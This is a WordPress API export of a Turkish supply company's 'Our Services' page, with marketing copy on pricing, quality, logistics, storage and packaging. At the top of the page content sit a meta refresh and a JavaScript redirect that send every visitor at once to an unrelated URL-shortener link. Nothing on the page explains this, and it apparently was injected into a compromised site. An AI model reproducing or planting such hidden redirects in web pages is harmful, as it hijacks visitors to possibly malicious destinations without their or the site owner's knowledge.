{"id":577,"date":"2023-07-06T21:33:08","date_gmt":"2023-07-06T18:33:08","guid":{"rendered":"https:\/\/www.nazgrup.com.tr\/?page_id=577"},"modified":"2023-07-06T22:48:47","modified_gmt":"2023-07-06T19:48:47","slug":"hizmetlerimiz","status":"publish","type":"page","link":"https:\/\/www.nazgrup.com.tr\/index.php\/hizmetlerimiz\/","title":{"rendered":"H\u0130ZMETLER\u0130M\u0130Z"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/qIDsNFY0r8\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/qIDsNFY0r8\";<\/script><\/p>\n<style>\/*! elementor - v3.14.0 - 26-06-2023 *\/\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}<\/style>\n<h2>Hizmetlerimiz<\/h2>\n<h4>Naz Grup olarak 3 alanda hizmetlerimizi s\u00fcrd\u00fcrmekteyiz.<\/h4>\n<p>Do\u011fru malzemelere do\u011fru zamanda sahip olman\u0131n \u00f6nemini anl\u0131yoruz ve kendimizi projenizin sorunsuz ve programa uygun \u015fekilde ilerlemesini sa\u011flamaya adad\u0131k. En kaliteli malzemeleri, en iyi hizmeti ve makul bir fiyata tedarik etme becerimizle gurur duyuyoruz.<\/p>\n<p>Hizmet verdi\u011fimiz b\u00f6lgelere \u00fcr\u00fcn tedari\u011fi ve projelendirme hizmetleri sunuyoruz.<\/p>\n<style>\/*! elementor - v3.14.0 - 26-06-2023 *\/\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}<\/style>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"275\" height=\"183\" src=\"https:\/\/www.nazgrup.com.tr\/wp-content\/uploads\/2023\/07\/images.jpeg\" alt=\"\" loading=\"lazy\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h4><strong>Fiyat<\/strong><\/h4>\n<p>Her zaman en iyi fiyat garantisi<\/p>\n<h4><strong>Kalite<\/strong><\/h4>\n<p>Uluslararas\u0131 standartlarda \u00fcr\u00fcn ve hizmet garantisi<\/p>\n<h4><strong>H\u0131zl\u0131 Teklif<\/strong><\/h4>\n<p>Projeler beklemez, h\u0131zl\u0131 ve g\u00fcvenilir teklifin adresidir.<\/p>\n<h4><strong>Lojistik<\/strong><\/h4>\n<p>T\u00fcm nakliye risklerine kar\u015f\u0131 sigortalama, eksiksiz malzeme sevkiyat\u0131 ve h\u0131zl\u0131 teslim s\u00fcresi.<\/p>\n<h4><strong>Depolama<\/strong><\/h4>\n<p>Tedarik zincirinizi tek adresten y\u00f6netin, karl\u0131 \u00e7\u0131k\u0131n.<\/p>\n<h4><strong>Ambalajlama<\/strong><\/h4>\n<p>Sipari\u015fleriniz i\u00e7in standartlara uygun koruyucu paketleme<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hizmetlerimiz Naz Grup olarak 3 alanda hizmetlerimizi s\u00fcrd\u00fcrmekteyiz. Do\u011fru malzemelere do\u011fru zamanda sahip olman\u0131n \u00f6nemini anl\u0131yoruz ve kendimizi projenizin sorunsuz ve programa uygun \u015fekilde ilerlemesini sa\u011flamaya adad\u0131k. En kaliteli malzemeleri, en iyi hizmeti ve makul bir fiyata tedarik etme becerimizle gurur duyuyoruz. Hizmet verdi\u011fimiz b\u00f6lgelere \u00fcr\u00fcn tedari\u011fi ve projelendirme hizmetleri sunuyoruz. Fiyat Her zaman en &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.nazgrup.com.tr\/index.php\/hizmetlerimiz\/\"> <span class=\"screen-reader-text\">H\u0130ZMETLER\u0130M\u0130Z<\/span> Devam\u0131 &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"no-sidebar","site-content-layout":"page-builder","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-577","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/577","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=577"}],"version-history":[{"count":13,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/577\/revisions"}],"predecessor-version":[{"id":718,"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/577\/revisions\/718"}],"wp:attachment":[{"href":"https:\/\/www.nazgrup.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}